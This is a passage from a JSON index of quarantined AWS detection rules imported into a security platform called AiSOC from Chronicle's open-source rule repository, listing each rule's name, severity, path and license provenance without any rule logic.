"chronicle/detection-rules", "source_id": "aws_guardduty_crypto_currency_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_crypto_currency_activity_detected.yaral" } }, { "id": 
"chronicle-detection-rules-aws-guardduty-denial-of-service-activity-detected", "type": "detection", "name": "aws_guardduty_denial_of_service_activity_detected", "description": "aws_guardduty_denial_of_service_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-denial-of-service-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_denial_of_service_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_denial_of_service_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-dga-domain-activity-detected", "type": "detection", "name": "aws_guardduty_dga_domain_activity_detected", "description": "aws_guardduty_dga_domain_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-dga-domain-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_dga_domain_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_dga_domain_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-disabled", "type": "detection", "name": "aws_guardduty_disabled", "description": "aws_guardduty_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_disabled.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-malicious-or-suspicious-file-executed", "type": "detection", "name": "aws_guardduty_malicious_or_suspicious_file_executed", "description": "aws_guardduty_malicious_or_suspicious_file_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-malicious-or-suspicious-file-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"aws_guardduty_malicious_or_suspicious_file_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_malicious_or_suspicious_file_executed.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-penetration-testing-activity-detected", "type": "detection", "name": "aws_guardduty_penetration_testing_activity_detected", "description": "aws_guardduty_penetration_testing_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-penetration-testing-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_penetration_testing_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_penetration_testing_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-publishing-destination-deleted", "type": "detection", "name": "aws_guardduty_publishing_destination_deleted", "description": "aws_guardduty_publishing_destination_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/aws-guardduty-publishing-destination-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_publishing_destination_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_publishing_destination_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-tor-network-activity-detected", "type": "detection", "name": "aws_guardduty_tor_network_activity_detected", "description": "aws_guardduty_tor_network_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-tor-network-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_tor_network_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_tor_network_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-trusted-or-threat-ip-lists-tampered", "type": "detection", "name": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "description": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-trusted-or-threat-ip-lists-tampered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_trusted_or_threat_ip_lists_tampered.yaral" } }, { "id": "chronicle-detection-rules-aws-high-number-of-unknown-user-authentication-attempts", "type": "detection", "name": "aws_high_number_of_unknown_user_authentication_attempts", "description": "aws_high_number_of_unknown_user_authentication_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-high-number-of-unknown-user-authentication-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_high_number_of_unknown_user_authentication_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_high_number_of_unknown_user_authentication_attempts.yaral" } }, { "id": 
"chronicle-detection-rules-aws-iam-access-analyzer-deleted", "type": "detection", "name": "aws_iam_access_analyzer_deleted", "description": "aws_iam_access_analyzer_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-access-analyzer-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_access_analyzer_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_access_analyzer_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-access-denied-discovery-events", "type": "detection", "name": "aws_iam_access_denied_discovery_events", "description": "aws_iam_access_denied_discovery_events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-access-denied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_access_denied_discovery_events", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/aws/cloudtrail/aws_iam_access_denied_discovery_events.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-activity-by-s3-browser-utility", "type": "detection", "name": "aws_iam_activity_by_s3_browser_utility", "description": "aws_iam_activity_by_s3_browser_utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-activity-by-s3-browser-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_activity_by_s3_browser_utility", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_activity_by_s3_browser_utility.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-activity-from-ec2-instance", "type": "detection", "name": "aws_iam_activity_from_ec2_instance", "description": "aws_iam_activity_from_ec2_instance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-activity-from-ec2-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_activity_from_ec2_instance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_activity_from_ec2_instance.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-administrator-access-policy-attached", "type": "detection", "name": "aws_iam_administrator_access_policy_attached", "description": "aws_iam_administrator_access_policy_attached", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-administrator-access-policy-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_administrator_access_policy_attached", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_administrator_access_policy_attached.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-compromised-key-quarantine-policy-attached", "type": "detection", "name": "aws_iam_compromised_key_quarantine_policy_attached", "description": "aws_iam_compromised_key_quarantine_policy_attached", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-compromised-key-quarantine-policy-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_compromised_key_quarantine_policy_attached", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_compromised_key_quarantine_policy_attached.yaral" } }, { "id": "chronicle-detection-rules-aws-kms-key-disabled-or-scheduled-for-deletion", "type": "detection", "name": "aws_kms_key_disabled_or_scheduled_for_deletion", "description": "aws_kms_key_disabled_or_scheduled_for_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-kms-key-disabled-or-scheduled-for-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_kms_key_disabled_or_scheduled_for_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_kms_key_disabled_or_scheduled_for_deletion.yaral" } }, { "id": "chronicle-detection-rules-aws-lambda-update-function-code", "type": "detection", "name": "aws_lambda_update_function_code", "description": "aws_lambda_update_function_code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-lambda-update-function-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_lambda_update_function_code", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_lambda_update_function_code.yaral" } }, { "id": "chronicle-detection-rules-aws-lateral-movement-using-iam-session-token", "type": "detection", "name": "aws_lateral_movement_using_iam_session_token", "description": "aws_lateral_movement_using_iam_session_token", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-lateral-movement-using-iam-session-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_lateral_movement_using_iam_session_token", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_lateral_movement_using_iam_session_token.yaral" } }, { "id": "chronicle-detection-rules-aws-multi-factor-authentication-disabled", "type": "detection", "name": "aws_multi_factor_authentication_disabled", "description": "aws_multi_factor_authentication_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_multi_factor_authentication_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_multi_factor_authentication_disabled.yaral" } }, { "id": "chronicle-detection-rules-aws-new-mfa-method-registered-for-user", "type": "detection", "name": "aws_new_mfa_method_registered_for_user", "description": "aws_new_mfa_method_registered_for_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_new_mfa_method_registered_for_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_new_mfa_method_registered_for_user.yaral" } }, { "id": "chronicle-detection-rules-aws-password-policy-change", "type": "detection", "name": "aws_password_policy_change", "description": "aws_password_policy_change", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-password-policy-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_password_policy_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_password_policy_change.yaral" } }, { "id": "chronicle-detection-rules-aws-privilege-escalation-using-iam-access-key", "type": "detection", "name": "aws_privilege_escalation_using_iam_access_key", "description": "aws_privilege_escalation_using_iam_access_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-privilege-escalation-using-iam-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_privilege_escalation_using_iam_access_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_privilege_escalation_using_iam_access_key.yaral" } }, { "id": 
"chronicle-detection-rules-aws-privilege-escalation-using-iam-login-profile", "type": "detection", "name": "aws_privilege_escalation_using_iam_login_profile", "description": "aws_privilege_escalation_using_iam_login_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-privilege-escalation-using-iam-login-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_privilege_escalation_using_iam_login_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_privilege_escalation_using_iam_login_profile.yaral" } }, { "id": "chronicle-detection-rules-aws-rds-snapshot-shared-publicly", "type": "detection", "name": "aws_rds_snapshot_shared_publicly", "description": "aws_rds_snapshot_shared_publicly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-rds-snapshot-shared-publicly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_rds_snapshot_shared_publicly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_rds_snapshot_shared_publicly.yaral" } }, { "id": "chronicle-detection-rules-aws-s3-made-public-by-acl", "type": "detection", "name": "aws_s3_made_public_by_acl", "description": "aws_s3_made_public_by_acl", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-s3-made-public-by-acl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_s3_made_public_by_acl", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_s3_made_public_by_acl.yaral" } }, { "id": "chronicle-detection-rules-aws-s3-public-access-block-removed", "type": "detection", "name": "aws_s3_public_access_block_removed", "description": "aws_s3_public_access_block_removed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-s3-public-access-block-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_s3_public_access_block_removed", "source_commit": "74dd490", "license": 
"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_s3_public_access_block_removed.yaral" } }, { "id": "chronicle-detection-rules-aws-saml-identity-provider-changes", "type": "detection", "name": "aws_saml_identity_provider_changes", "description": "aws_saml_identity_provider_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-saml-identity-provider-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_saml_identity_provider_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_saml_identity_provider_changes.yaral" } }, { "id": "chronicle-detection-rules-aws-security-group-open-to-world", "type": "detection", "name": "aws_security_group_open_to_world", "description": "aws_security_group_open_to_world", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-security-group-open-to-world.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"aws_security_group_open_to_world", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_security_group_open_to_world.yaral" } }, { "id": "chronicle-detection-rules-aws-ses-service-modification", "type": "detection", "name": "aws_ses_service_modification", "description": "aws_ses_service_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ses-service-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ses_service_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ses_service_modification.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-api-from-tor-exit-node", "type": "detection", "name": "aws_successful_api_from_tor_exit_node", "description": "aws_successful_api_from_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-api-from-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": 
{ "source": "chronicle/detection-rules", "source_id": "aws_successful_api_from_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_api_from_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-console-authentication-from-multiple-ips", "type": "detection", "name": "aws_successful_console_authentication_from_multiple_ips", "description": "aws_successful_console_authentication_from_multiple_ips", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-console-authentication-from-multiple-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_successful_console_authentication_from_multiple_ips", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_console_authentication_from_multiple_ips.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-login-after-multiple-failed-attempts", "type": "detection", "name": "aws_successful_login_after_multiple_failed_attempts", "description": "aws_successful_login_after_multiple_failed_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-login-after-multiple-failed-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_successful_login_after_multiple_failed_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_login_after_multiple_failed_attempts.yaral" } }, { "id": "chronicle-detection-rules-aws-unusual-number-of-failed-authentications-from-the-same-ip", "type": "detection", "name": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "description": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-unusual-number-of-failed-authentications-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 